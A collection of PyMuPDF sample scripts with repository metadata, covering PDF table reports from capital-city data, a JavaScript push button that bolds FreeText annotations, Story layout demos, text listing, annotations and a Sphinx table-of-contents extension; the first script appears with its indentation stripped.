Malaysia;Kuala Lumpur;1782500;5.3%;2019
Romania;Bucharest;1716983;8.9%;2021
Hungary;Budapest;1706851;17.6%;2022
Congo;Brazzaville;1696392;29.1%;2015
Serbia;Belgrade;1688667;23.1%;2021
Uganda;Kampala;1680600;3.7%;2019
Guinea;Conakry;1660973;12.3%;2014
Mongolia;Ulaanbaatar;1466125;43.8%;2020
Honduras;Tegucigalpa;1444085;14.0%;2021
Senegal;Dakar;1438725;8.5%;2021
Niger;Niamey;1334984;5.3%;2020
Uruguay;Montevideo;1319108;38.5%;2011
Bulgaria;Sofia;1307439;19.0%;2021
Oman;Muscat;1294101;28.6%;2021
Czech Republic;Prague;1275406;12.1%;2022
Madagascar;Antananarivo;1275207;4.4%;2018
Kazakhstan;Astana;1239900;6.5%;2022
Nigeria;Abuja;1235880;0.6%;2011
Georgia;Tbilisi;1201769;32.0%;2022
Mauritania;Nouakchott;1195600;25.9%;2019
Qatar;Doha;1186023;44.1%;2020
Libya;Tripoli;1170000;17.4%;2019
Myanmar;Naypyidaw;1160242;2.2%;2014
Rwanda;Kigali;1132686;8.4%;2012
Mozambique;Maputo;1124988;3.5%;2020
Dominican Republic;Santo Domingo;1111838;10.0%;2010
Armenia;Yerevan;1096100;39.3%;2021
Kyrgyzstan;Bishkek;1074075;16.5%;2021
Sierra Leone;Freetown;1055964;12.5%;2015
Nicaragua;Managua;1055247;15.4%;2020
Canada;Ottawa;1017449;2.7%;2021
Pakistan;Islamabad;1014825;0.4%;2017
Liberia;Monrovia;1010970;19.5%;2008
United Arab Emirates;Abu Dhabi;1010092;10.8%;2020
Malawi;Lilongwe;989318;5.0%;2018
Haiti;Port-au-Prince;987310;8.6%;2015
Sweden;Stockholm;978770;9.4%;2021
Eritrea;Asmara;963000;26.6%;2020
Israel;Jerusalem;936425;10.5%;2019
Laos;Vientiane;927724;12.5%;2019
Chad;N'Djamena;916000;5.3%;2009
Netherlands;Amsterdam;905234;5.2%;2022
Central African Republic;Bangui;889231;16.3%;2020
Panama;Panama City;880691;20.2%;2013
Tajikistan;Dushanbe;863400;8.9%;2020
Nepal;Kathmandu;845767;2.8%;2021
Togo;Lomé;837437;9.7%;2010
Turkmenistan;Ashgabat;791000;12.5%;2017
Moldova;Chişinău;779300;25.5%;2019
Croatia;Zagreb;769944;19.0%;2021
Gabon;Libreville;703904;30.1%;2013
Norway;Oslo;697010;12.9%;2021
Macau;Macau;671900;97.9%;2022
United States;Washington D.C.;670050;0.2%;2021
Jamaica;Kingston;662491;23.4%;2019
Finland;Helsinki;658864;11.9%;2021
Tunisia;Tunis;638845;5.2%;2014
Denmark;Copenhagen;638117;10.9%;2021
Greece;Athens;637798;6.1%;2021
Latvia;Riga;605802;32.3%;2021
Djibouti;Djibouti (city);604013;54.6%;2012
Ireland;Dublin;588233;11.8%;2022
Morocco;Rabat;577827;1.6%;2014
Lithuania;Vilnius;576195;20.7%;2022
El Salvador;San Salvador;570459;9.0%;2019
Albania;Tirana;557422;19.5%;2011
North Macedonia;Skopje;544086;25.9%;2015
South Sudan;Juba;525953;4.9%;2017
Paraguay;Asunción;521559;7.8%;2020
Portugal;Lisbon;509614;5.0%;2020
Guinea-Bissau;Bissau;492004;23.9%;2015
Slovakia;Bratislava;440948;8.1%;2020
Estonia;Tallinn;438341;33.0%;2021
Australia;Canberra;431380;1.7%;2020
Namibia;Windhoek;431000;17.0%;2020
Tanzania;Dodoma;410956;0.6%;2012
Papua New Guinea;Port Moresby;364145;3.7%;2011
Ivory Coast;Yamoussoukro;361893;1.3%;2020
Lebanon;Beirut;361366;6.5%;2014
Bolivia;Sucre;360544;3.0%;2022
Puerto Rico (US);San Juan;342259;10.5%;2020
Costa Rica;San José;342188;6.6%;2018
Lesotho;Maseru;330760;14.5%;2016
Cyprus;Nicosia;326739;26.3%;2016
Equatorial Guinea;Malabo;297000;18.2%;2018
Slovenia;Ljubljana;285604;13.5%;2021
East Timor;Dili;277279;21.0%;2015
Bosnia and Herzegovina;Sarajevo;275524;8.4%;2013
Bahamas;Nassau;274400;67.3%;2016
Botswana;Gaborone;273602;10.6%;2020
Benin;Porto-Novo;264320;2.0%;2013
Suriname;Paramaribo;240924;39.3%;2012
India;New Delhi;249998;0.0%;2011
Sahrawi Arab Democratic Republic;Laayoune (claimed) - Tifariti (de facto);217732 - 3000;—;2014
New Zealand;Wellington;217000;4.2%;2021
Bahrain;Manama;200000;13.7%;2020
Kosovo;Pristina;198897;12.0%;2011
Montenegro;Podgorica;190488;30.3%;2020
Belgium;Brussels;187686;1.6%;2022
Cape Verde;Praia;159050;27.1%;2017
Mauritius;Port Louis;147066;11.3%;2018
Curaçao (Netherlands);Willemstad;136660;71.8%;2011
Burundi;Gitega;135467;1.1%;2020
Switzerland;Bern (de facto);134591;1.5%;2020
Transnistria;Tiraspol;133807;38.5%;2015
Maldives;Malé;133412;25.6%;2014
Iceland;Reykjavík;133262;36.0%;2021
Luxembourg;Luxembourg City;124509;19.5%;2021
Guyana;Georgetown;118363;14.7%;2012
Bhutan;Thimphu;114551;14.7%;2017
Comoros;Moroni;111326;13.5%;2016
Barbados;Bridgetown;110000;39.1%;2014
Sri Lanka;Sri Jayawardenepura Kotte;107925;0.5%;2012
Brunei;Bandar Seri Begawan;100700;22.6%;2007
Eswatini;Mbabane;94874;8.0%;2010
New Caledonia (France);Nouméa;94285;32.8%;2019
Fiji;Suva;93970;10.2%;2017
Solomon Islands;Honiara;92344;13.0%;2021
Republic of Artsakh;Stepanakert;75000;62.5%;2021
Gambia;Banjul;73000;2.8%;2013
São Tomé and Príncipe;São Tomé;71868;32.2%;2015
Kiribati;Tarawa;70480;54.7%;2020
Vanuatu;Port Vila;51437;16.1%;2016
Northern Mariana Islands (USA);Saipan;47565;96.1%;2017
Samoa;Apia;41611;19.0%;2021
Palestine;Ramallah (de facto);38998;0.8%;2017
Monaco;Monaco;38350;104.5%;2020
Jersey (UK);Saint Helier;37540;34.2%;2018
Trinidad and Tobago;Port of Spain;37074;2.4%;2011
Cayman Islands (UK);George Town;34399;50.5%;2021
Gibraltar (UK);Gibraltar;34003;104.1%;2020
Grenada;St. George's;33734;27.1%;2012
Aruba (Netherlands);Oranjestad;28294;26.6%;2010
Isle of Man (UK);Douglas;27938;33.2%;2011
Marshall Islands;Majuro;27797;66.1%;2011
Tonga;Nukuʻalofa;27600;26.0%;2022
Seychelles;Victoria;26450;24.8%;2010
French Polynesia (France);Papeete;26926;8.9%;2017
Andorra;Andorra la Vella;22873;28.9%;2022
Faroe Islands (Denmark);Tórshavn;22738;43.0%;2022
Antigua and Barbuda;St. John's;22219;23.8%;2011
Belize;Belmopan;20621;5.2%;2016
Saint Lucia;Castries;20000;11.1%;2013
Guernsey (UK);Saint Peter Port;18958;30.1%;2019
Greenland (Denmark);Nuuk;18800;33.4%;2021
Dominica;Roseau;14725;20.3%;2011
Saint Kitts and Nevis;Basseterre;14000;29.4%;2018
Saint Vincent and the Grenadines;Kingstown;12909;12.4%;2012
British Virgin Islands (UK);Road Town;12603;40.5%;2012
Åland (Finland);Mariehamn;11736;39.0%;2021
U.S. Virgin Islands (US);Charlotte Amalie;14477;14.5%;2020
Micronesia;Palikir;6647;5.9%;2010
Tuvalu;Funafuti;6320;56.4%;2017
Malta;Valletta;5827;1.1%;2019
Liechtenstein;Vaduz;5774;14.8%;2021
Saint Pierre and Miquelon (France);Saint-Pierre;5394;91.7%;2019
Cook Islands (NZ);Avarua;4906;28.9%;2016
San Marino;City of San Marino;4061;12.0%;2021
Turks and Caicos Islands (UK);Cockburn Town;3720;8.2%;2016
American Samoa (USA);Pago Pago;3656;8.1%;2010
Saint Martin (France);Marigot;3229;10.1%;2017
Saint Barthélemy (France);Gustavia;2615;24.1%;2010
Falkland Islands (UK);Stanley;2460;65.4%;2016
Svalbard (Norway);Longyearbyen;2417;82.2%;2020
Sint Maarten (Netherlands);Philipsburg;1894;4.3%;2011
Christmas Island (Australia);Flying Fish Cove;1599;86.8%;2016
Anguilla (UK);The Valley;1067;6.8%;2011
Guam (US);Hagåtña;1051;0.6%;2010
Wallis and Futuna (France);Mata Utu;1029;8.9%;2018
Bermuda (UK);Hamilton;854;1.3%;2016
Nauru;Yaren (de facto);747;6.0%;2011
Saint Helena (UK);Jamestown;629;11.6%;2016
Niue (NZ);Alofi;597;30.8%;2017
Tokelau (NZ);Atafu;541;29.3%;2016
Vatican City;Vatican City (city-state);453;100%;2019
Montserrat (UK);Brades (de facto) - Plymouth (de jure);449 - 0;-;2011
Norfolk Island (Australia);Kingston;341;-;2015
Palau;Ngerulmud;271;1.5%;2010
Cocos (Keeling) Islands (Australia);West Island;134;24.6%;2011
Pitcairn Islands (UK);Adamstown;40;100.0%;2021
South Georgia and the South Sandwich Islands (UK);King Edward Point;22;73.3%;2018"""
# -------------------------------------------------------------------
# HTML template for the report. We define no table header <th> items
# because this is done in post processing.
# The actual template part is the table row, identified by id "row".
# The content of each cell will be filled using the respective id.
# -------------------------------------------------------------------
HTML = """
<h1 style="text-align:center">World Capital Cities</h1>
<p><i>Percent "%" is city population as a percentage of the country, as of "Year".</i>
</p><p></p>
<table>
<tr id="row">
<td id="country"></td>
<td id="capital"></td>
<td id="population"></td>
<td id="percent"></td>
<td id="year"></td>
</tr>
</table>
"""
# -------------------------------------------------------------------
# Sets font-family globally to sans-serif, and text-align to right
# for the numerical table columns.
# -------------------------------------------------------------------
CSS = """
body {
font-family: sans-serif;
}
td[id="population"], td[id="percent"], td[id="year"] {
text-align: right;
padding-right: 2px;
}"""
# -------------------------------------------------------------------
# recorder function for cell positions
# -------------------------------------------------------------------
coords = {} # stores cell gridline coordinates
def recorder(elpos):
"""We only record positions of table rows and cells.
Information is stored in "coords" with page number as key.
"""
global coords # dictionary of row and cell coordinates per page
if elpos.open_close != 2: # only consider coordinates provided at "close"
return
if elpos.id not in ("row", "country", "capital", "population", "percent", "year"):
return # only look at row / cell content
rect = pymupdf.Rect(elpos.rect) # cell rectangle
if rect.y1 > elpos.filled: # ignore stuff below the filled rectangle
return
# per page, we store the floats top-most y, right-most x, column left
# and row bottom borders.
x, y, x1, y0 = coords.get(elpos.page, (set(), set(), 0, sys.maxsize))
if elpos.id != "row":
x.add(rect.x0) # add cell left border coordinate
if rect.x1 > x1: # store right-most cell border on page
x1 = rect.x1
else:
y.add(rect.y1) # add row bottom border coordinate
if rect.y0 < y0: # store top-most cell border per page
y0 = rect.y0
coords[elpos.page] = (x, y, x1, y0) # write back info per page
return
# -------------------------------------------------------------------
# define database access: make an intermediate memory database for
# our demo purposes.
# -------------------------------------------------------------------
dbfilename = ":memory:" # the SQLITE database file name
database = sqlite3.connect(dbfilename) # open database
cursor = database.cursor() # multi-purpose database cursor
# Define and fill the SQLITE database
cursor.execute(
"""CREATE TABLE capitals (Country text, Capital text, Population text, Percent text, Year text)"""
)
for value in table_data.splitlines():
cursor.execute("INSERT INTO capitals VALUES (?,?,?,?,?)", value.split(";"))
# select statement for the rows - let SQL also sort it for us
select = """SELECT * FROM capitals ORDER BY "Country" """
# -------------------------------------------------------------------
# define the HTML Story and fill it with database data
# -------------------------------------------------------------------
story = pymupdf.Story(HTML, user_css=CSS)
body = story.body # access the HTML body detail
template = body.find(None, "id", "row") # find the template part
table = body.find("table", None, None) # find start of table
# read the rows from the database and put them all in one Python list
# NOTE: instead, we might fetch rows one by one (advisable for large volumes)
cursor.execute(select) # execute cursor, and ...
rows = cursor.fetchall() # read out what was found
database.close() # no longer needed
for country, capital, population, percent, year in rows: # iterate through the row
row = template.clone() # clone the template to report each row
row.find(None, "id", "country").add_text(country)
row.find(None, "id", "capital").add_text(capital)
row.find(None, "id", "population").add_text(population)
row.find(None, "id", "percent").add_text(percent)
row.find(None, "id", "year").add_text(year)
table.append_child(row)
template.remove() # remove the template
# -------------------------------------------------------------------
# generate the PDF and write it to memory
# -------------------------------------------------------------------
fp = io.BytesIO()
writer = pymupdf.DocumentWriter(fp)
mediabox = pymupdf.paper_rect("letter") # use pages in Letter format
where = mediabox + (36, 36, -36, -72) # leave page borders
more = True
page = 0
while more:
dev = writer.begin_page(mediabox) # make a new page
if page > 0: # leave room above the cells for inserting header row
delta = (0, 20, 0, 0)
else:
delta = (0, 0, 0, 0)
more, filled = story.place(where + delta) # arrange content on this rectangle
story.element_positions(recorder, {"page": page, "filled": where.y1})
story.draw(dev) # write content to page
writer.end_page() # finish the page
page += 1
writer.close() # close the PDF
# -------------------------------------------------------------------
# re-open memory PDF for inserting gridlines and header rows
# -------------------------------------------------------------------
doc = pymupdf.open("pdf", fp)
for page in doc:
page.wrap_contents() # ensure all "cm" commands are properly wrapped
x, y, x1, y0 = coords[page.number] # read coordinates of the page
x = sorted(list(x)) + [x1] # list of cell left-right borders
y = [y0] + sorted(list(y)) # list of cell top-bottom borders
shape = page.new_shape() # make a canvas to draw upon
for item in y: # draw horizontal lines (one under each row)
shape.draw_line((x[0] - 2, item), (x[-1] + 2, item))
for i in range(len(y)): # alternating row coloring
if i % 2:
rect = (x[0] - 2, y[i - 1], x[-1] + 2, y[i])
shape.draw_rect(rect)
for i in range(len(x)): # draw vertical lines
d = 2 if i == len(x) - 1 else -2
shape.draw_line((x[i] + d, y[0]), (x[i] + d, y[-1]))
# Write header row above table content
y0 -= 5 # bottom coord for header row text
shape.insert_text((x[0], y0), "Country", fontname="hebo", fontsize=12)
shape.insert_text((x[1], y0), "Capital", fontname="hebo", fontsize=12)
shape.insert_text((x[2], y0), "Population", fontname="hebo", fontsize=12)
shape.insert_text((x[3], y0), " %", fontname="hebo", fontsize=12)
shape.insert_text((x[4], y0), "Year", fontname="hebo", fontsize=12)
# Write page footer
y0 = page.rect.height - 50 # top coordinate of footer bbox
bbox = pymupdf.Rect(0, y0, page.rect.width, y0 + 20) # footer bbox
page.insert_textbox(
bbox,
f"World Capital Cities, Page {page.number+1} of {doc.page_count}",
align=pymupdf.TEXT_ALIGN_CENTER,
)
shape.finish(width=0.3, color=0.5, fill=0.9) # rectangles and gray lines
shape.commit(overlay=False) # put the drawings in background
doc.subset_fonts()
doc.save(__file__.replace(".py", ".pdf"), deflate=True, garbage=4, pretty=True)
doc.close()
| 17,442 | Python | .py | 414 | 39.845411 | 102 | 0.704503 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,316 | make-bold.py | pymupdf_PyMuPDF/docs/samples/make-bold.py | """
Problem: Since MuPDF v1.16 a 'Freetext' annotation font is restricted to the
"normal" versions (no bold, no italics) of Times-Roman, Helvetica, Courier.
It is impossible to use PyMuPDF to modify this.
Solution: Using Adobe's JavaScript API, it is possible to manipulate properties
of Freetext annotations. Check out these references:
https://www.adobe.com/content/dam/acom/en/devnet/acrobat/pdfs/js_api_reference.pdf,
or https://www.adobe.com/devnet/acrobat/documentation.html.
Function 'this.getAnnots()' will return all annotations as an array. We loop
over this array to set the properties of the text through the 'richContents'
attribute.
There is no explicit property to set text to bold, but it is possible to set
fontWeight=800 (400 is the normal size) of richContents.
Other attributes, like color, italics, etc. can also be set via richContents.
If we have 'FreeText' annotations created with PyMuPDF, we can make use of this
JavaScript feature to modify the font - thus circumventing the above restriction.
Use PyMuPDF v1.16.12 to create a push button that executes a Javascript
containing the desired code. This is what this program does.
Then open the resulting file with Adobe reader (!).
After clicking on the button, all Freetext annotations will be bold, and the
file can be saved.
If desired, the button can be removed again, using free tools like PyMuPDF or
PDF XChange editor.
Note / Caution:
---------------
The JavaScript will **only** work if the file is opened with Adobe Acrobat reader!
When using other PDF viewers, the reaction is unforeseeable.
"""
import sys
import pymupdf
# this JavaScript will execute when the button is clicked:
jscript = """
var annt = this.getAnnots();
annt.forEach(function (item, index) {
try {
var span = item.richContents;
span.forEach(function (it, dx) {
it.fontWeight = 800;
})
item.richContents = span;
} catch (err) {}
});
app.alert('Done');
"""
i_fn = sys.argv[1] # input file name
o_fn = "bold-" + i_fn # output filename
doc = pymupdf.open(i_fn) # open input
page = doc[0] # get desired page
# ------------------------------------------------
# make a push button for invoking the JavaScript
# ------------------------------------------------
widget = pymupdf.Widget() # create widget
# make it a 'PushButton'
widget.field_type = pymupdf.PDF_WIDGET_TYPE_BUTTON
widget.field_flags = pymupdf.PDF_BTN_FIELD_IS_PUSHBUTTON
widget.rect = pymupdf.Rect(5, 5, 20, 20) # button position
widget.script = jscript # fill in JavaScript source text
widget.field_name = "Make bold" # arbitrary name
widget.field_value = "Off" # arbitrary value
widget.fill_color = (0, 0, 1) # make button visible
annot = page.add_widget(widget) # add the widget to the page
doc.save(o_fn) # output the file
| 2,818 | Python | .py | 62 | 43.403226 | 83 | 0.725118 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,317 | table01.py | pymupdf_PyMuPDF/docs/samples/table01.py | """
Demo script for basic HTML table support in Story objects
Outputs a table with three columns that fits on one Letter page.
The content of each row is filled via the Story's template mechanism.
Column widths and row heights are automatically computed by MuPDF.
Some styling via a CSS source is also demonstrated:
- The table header row has a gray background
- Each cell shows a border at its top
- The Story's body uses the sans-serif font family
- The text of one of the columns is set to blue
Dependencies
-------------
PyMuPDF v1.22.0 or later
"""
import pymupdf
table_text = ( # the content of each table row
(
"Length",
"integer",
"""(Required) The number of bytes from the beginning of the line following the keyword stream to the last byte just before the keyword endstream. (There may be an additional EOL marker, preceding endstream, that is not included in the count and is not logically part of the stream data.) See “Stream Extent,” above, for further discussion.""",
),
(
"Filter",
"name or array",
"""(Optional) The name of a filter to be applied in processing the stream data found between the keywords stream and endstream, or an array of such names. Multiple filters should be specified in the order in which they are to be applied.""",
),
(
"FFilter",
"name or array",
"""(Optional; PDF 1.2) The name of a filter to be applied in processing the data found in the stream's external file, or an array of such names. The same rules apply as for Filter.""",
),
(
"FDecodeParms",
"dictionary or array",
"""(Optional; PDF 1.2) A parameter dictionary, or an array of such dictionaries, used by the filters specified by FFilter. The same rules apply as for DecodeParms.""",
),
(
"DecodeParms",
"dictionary or array",
"""(Optional) A parameter dictionary or an array of such dictionaries, used by the filters specified by Filter. If there is only one filter and that filter has parameters, DecodeParms must be set to the filter's parameter dictionary unless all the filter's parameters have their default values, in which case the DecodeParms entry may be omitted. If there are multiple filters and any of the filters has parameters set to nondefault values, DecodeParms must be an array with one entry for each filter: either the parameter dictionary for that filter, or the null object if that filter has no parameters (or if all of its parameters have their default values). If none of the filters have parameters, or if all their parameters have default values, the DecodeParms entry may be omitted. (See implementation note 7 in Appendix H.)""",
),
(
"DL",
"integer",
"""(Optional; PDF 1.5) A non-negative integer representing the number of bytes in the decoded (defiltered) stream. It can be used to determine, for example, whether enough disk space is available to write a stream to a file.\nThis value should be considered a hint only; for some stream filters, it may not be possible to determine this value precisely.""",
),
(
"F",
"file specification",
"""(Optional; PDF 1.2) The file containing the stream data. If this entry is present, the bytes between stream and endstream are ignored, the filters are specified by FFilter rather than Filter, and the filter parameters are specified by FDecodeParms rather than DecodeParms. However, the Length entry should still specify the number of those bytes. (Usually, there are no bytes and Length is 0.) (See implementation note 46 in Appendix H.)""",
),
)
# Only a minimal HTML source is required to provide the Story's working
HTML = """
<html>
<body><h2>TABLE 3.4 Entries common to all stream dictionaries</h2>
<table>
<tr>
<th>KEY</th><th>TYPE</th><th>VALUE</th>
</tr>
<tr id="row">
<td id="col0"></td><td id="col1"></td><td id="col2"></td>
</tr>
"""
"""
---------------------------------------------------------------------
Just for demo purposes, set:
- header cell background to gray
- text color in col1 to blue
- a border line at the top of all table cells
- all text to the sans-serif font
---------------------------------------------------------------------
"""
CSS = """th {
background-color: #aaa;
}
td[id="col1"] {
color: blue;
}
td, tr {
border: 1px solid black;
border-right-width: 0px;
border-left-width: 0px;
border-bottom-width: 0px;
}
body {
font-family: sans-serif;
}
"""
story = pymupdf.Story(HTML, user_css=CSS) # define the Story
body = story.body # access the HTML <body> of it
template = body.find(None, "id", "row") # find the template with name "row"
parent = template.parent # access its parent i.e., the <table>
for col0, col1, col2 in table_text:
row = template.clone() # make a clone of the row template
# add text to each cell in the duplicated row
row.find(None, "id", "col0").add_text(col0)
row.find(None, "id", "col1").add_text(col1)
row.find(None, "id", "col2").add_text(col2)
parent.append_child(row) # add new row to <table>
template.remove() # remove the template
# Story is ready - output it via a writer
writer = pymupdf.DocumentWriter(__file__.replace(".py", ".pdf"), "compress")
mediabox = pymupdf.paper_rect("letter") # size of one output page
where = mediabox + (36, 36, -36, -36) # use this sub-area for the content
more = True # detects end of output
while more:
dev = writer.begin_page(mediabox) # start a page, returning a device
more, filled = story.place(where) # compute content fitting into "where"
story.draw(dev) # output it to the page
writer.end_page() # finalize the page
writer.close() # close the output
| 5,790 | Python | .py | 112 | 47.660714 | 840 | 0.689686 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,318 | text-lister.py | pymupdf_PyMuPDF/docs/samples/text-lister.py | import sys
import pymupdf
def flags_decomposer(flags):
"""Make font flags human readable."""
l = []
if flags & 2 ** 0:
l.append("superscript")
if flags & 2 ** 1:
l.append("italic")
if flags & 2 ** 2:
l.append("serifed")
else:
l.append("sans")
if flags & 2 ** 3:
l.append("monospaced")
else:
l.append("proportional")
if flags & 2 ** 4:
l.append("bold")
return ", ".join(l)
doc = pymupdf.open(sys.argv[1])
page = doc[0]
# read page text as a dictionary, suppressing extra spaces in CJK fonts
blocks = page.get_text("dict", flags=11)["blocks"]
for b in blocks: # iterate through the text blocks
for l in b["lines"]: # iterate through the text lines
for s in l["spans"]: # iterate through the text spans
print("")
font_properties = "Font: '%s' (%s), size %g, color #%06x" % (
s["font"], # font name
flags_decomposer(s["flags"]), # readable font flags
s["size"], # font size
s["color"], # font color
)
print("Text: '%s'" % s["text"]) # simple print of text
print(font_properties)
| 1,221 | Python | .py | 36 | 26.305556 | 73 | 0.545377 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,319 | story-write.py | pymupdf_PyMuPDF/docs/samples/story-write.py | """
Demo script for PyMuPDF's `Story.write()` method.
This is a way of laying out a story into a PDF document, that avoids the need
to write a loop that calls `story.place()` and `story.draw()`.
Instead just a single function call is required, albeit with a `rectfn()`
callback that returns the rectangles into which the story is placed.
"""
import html
import pymupdf
# Create html containing multiple copies of our own source code.
#
with open(__file__) as f:
text = f.read()
text = html.escape(text)
html = f'''
<!DOCTYPE html>
<body>
<h1>Contents of {__file__}</h1>
<h2>Normal</h2>
<pre>
{text}
</pre>
<h2>Strong</h2>
<strong>
<pre>
{text}
</pre>
</strong>
<h2>Em</h2>
<em>
<pre>
{text}
</pre>
</em>
</body>
'''
def rectfn(rect_num, filled):
'''
We return four rectangles per page in this order:
1 3
2 4
'''
page_w = 800
page_h = 600
margin = 50
rect_w = (page_w - 3*margin) / 2
rect_h = (page_h - 3*margin) / 2
if rect_num % 4 == 0:
# New page.
mediabox = pymupdf.Rect(0, 0, page_w, page_h)
else:
mediabox = None
# Return one of four rects in turn.
rect_x = margin + (rect_w+margin) * ((rect_num // 2) % 2)
rect_y = margin + (rect_h+margin) * (rect_num % 2)
rect = pymupdf.Rect(rect_x, rect_y, rect_x + rect_w, rect_y + rect_h)
#print(f'rectfn(): rect_num={rect_num} filled={filled}. Returning: rect={rect}')
return mediabox, rect, None
story = pymupdf.Story(html, em=8)
out_path = __file__.replace('.py', '.pdf')
writer = pymupdf.DocumentWriter(out_path)
story.write(writer, rectfn)
writer.close()
| 1,638 | Python | .py | 63 | 22.873016 | 84 | 0.644932 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,320 | showpdf-page.py | pymupdf_PyMuPDF/docs/samples/showpdf-page.py | """
Demo of Story class in PyMuPDF
-------------------------------
This script demonstrates how to the results of a pymupdf.Story output can be
placed in a rectangle of an existing (!) PDF page.
"""
import io
import os
import pymupdf
def make_pdf(fileptr, text, rect, font="sans-serif", archive=None):
"""Make a memory DocumentWriter from HTML text and a rect.
Args:
fileptr: a Python file object. For example an io.BytesIO().
text: the text to output (HTML format)
rect: the target rectangle. Will use its width / height as mediabox
font: (str) font family name, default sans-serif
archive: pymupdf.Archive parameter. To be used if e.g. images or special
fonts should be used.
Returns:
The matrix to convert page rectangles of the created PDF back
to rectangle coordinates in the parameter "rect".
Normal use will expect to fit all the text in the given rect.
However, if an overflow occurs, this function will output multiple
pages, and the caller may decide to either accept or retry with
changed parameters.
"""
# use input rectangle as the page dimension
mediabox = pymupdf.Rect(0, 0, rect.width, rect.height)
# this matrix converts mediabox back to input rect
matrix = mediabox.torect(rect)
story = pymupdf.Story(text, archive=archive)
body = story.body
body.set_properties(font=font)
writer = pymupdf.DocumentWriter(fileptr)
while True:
device = writer.begin_page(mediabox)
more, _ = story.place(mediabox)
story.draw(device)
writer.end_page()
if not more:
break
writer.close()
return matrix
# -------------------------------------------------------------
# We want to put this in a given rectangle of an existing page
# -------------------------------------------------------------
HTML = """
<p>PyMuPDF is a great package! And it still improves significantly from one version to the next one!</p>
<p>It is a Python binding for <b>MuPDF</b>, a lightweight PDF, XPS, and E-book viewer, renderer, and toolkit.<br> Both are maintained and developed by Artifex Software, Inc.</p>
<p>Via MuPDF it can access files in PDF, XPS, OpenXPS, CBZ, EPUB, MOBI and FB2 (e-books) formats,<br> and it is known for its top
<b><i>performance</i></b> and <b><i>rendering quality.</p>"""
# Make a PDF page for demo purposes
root = os.path.abspath( f"{__file__}/..")
doc = pymupdf.open(f"{root}/mupdf-title.pdf")
page = doc[0]
WHERE = pymupdf.Rect(50, 100, 250, 500) # target rectangle on existing page
fileptr = io.BytesIO() # let DocumentWriter use this as its file
# -------------------------------------------------------------------
# call DocumentWriter and Story to fill our rectangle
matrix = make_pdf(fileptr, HTML, WHERE)
# -------------------------------------------------------------------
src = pymupdf.open("pdf", fileptr) # open DocumentWriter output PDF
if src.page_count > 1: # target rect was too small
raise ValueError("target WHERE too small")
# its page 0 contains our result
page.show_pdf_page(WHERE, src, 0)
doc.ez_save(f"{root}/mupdf-title-after.pdf")
| 3,201 | Python | .py | 67 | 43.268657 | 177 | 0.639307 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,321 | annotations-freetext.py | pymupdf_PyMuPDF/docs/samples/annotations-freetext.py | # -*- coding: utf-8 -*-
import pymupdf
# some colors
blue = (0,0,1)
green = (0,1,0)
red = (1,0,0)
gold = (1,1,0)
# a new PDF with 1 page
doc = pymupdf.open()
page = doc.new_page()
# 3 rectangles, same size, above each other
r1 = pymupdf.Rect(100,100,200,150)
r2 = r1 + (0,75,0,75)
r3 = r2 + (0,75,0,75)
# the text, Latin alphabet
t = "¡Un pequeño texto para practicar!"
# add 3 annots, modify the last one somewhat
a1 = page.add_freetext_annot(r1, t, text_color=red, border_color=red)
a2 = page.add_freetext_annot(r2, t, fontname="Ti", text_color=blue, border_color=blue)
a3 = page.add_freetext_annot(r3, t, fontname="Co", text_color=blue, rotate=90)
a3.set_border(width=0)
a3.update(fontsize=8, fill_color=gold)
# save the PDF
doc.save("a-freetext.pdf")
| 767 | Python | .py | 24 | 30.625 | 86 | 0.695238 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,322 | fulltoc.py | pymupdf_PyMuPDF/docs/extensions/fulltoc.py | # -*- encoding: utf-8 -*-
#
# Copyright © 2012 New Dream Network, LLC (DreamHost)
#
# Author: Doug Hellmann <doug.hellmann@dreamhost.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sphinx import addnodes
def html_page_context(app, pagename, templatename, context, doctree):
"""Event handler for the html-page-context signal.
Modifies the context directly.
- Replaces the 'toc' value created by the HTML builder with one
that shows all document titles and the local table of contents.
- Sets display_toc to True so the table of contents is always
displayed, even on empty pages.
- Replaces the 'toctree' function with one that uses the entire
document structure, ignores the maxdepth argument, and uses
only prune and collapse.
"""
rendered_toc = get_rendered_toctree(app.builder, pagename)
context["toc"] = rendered_toc
context["display_toc"] = True # force toctree to display
if "toctree" not in context:
# json builder doesn't use toctree func, so nothing to replace
return
def make_toctree(collapse=True, maxdepth=-1, includehidden=True):
return get_rendered_toctree(
app.builder,
pagename,
prune=False,
collapse=collapse,
)
context["toctree"] = make_toctree
def get_rendered_toctree(builder, docname, prune=False, collapse=True):
"""Build the toctree relative to the named document,
with the given parameters, and then return the rendered
HTML fragment.
"""
fulltoc = build_full_toctree(
builder,
docname,
prune=prune,
collapse=collapse,
)
rendered_toc = builder.render_partial(fulltoc)["fragment"]
return rendered_toc
def build_full_toctree(builder, docname, prune, collapse):
"""Return a single toctree starting from docname containing all
sub-document doctrees.
"""
env = builder.env
doctree = env.get_doctree(env.config.master_doc)
toctrees = []
for toctreenode in doctree.traverse(addnodes.toctree):
toctree = env.resolve_toctree(
docname,
builder,
toctreenode,
collapse=collapse,
prune=prune,
includehidden=True,
)
if toctree is not None:
toctrees.append(toctree)
if not toctrees:
return None
result = toctrees[0]
for toctree in toctrees[1:]:
if toctree:
result.extend(toctree.children)
env.resolve_references(result, docname, builder)
return result
def setup(app):
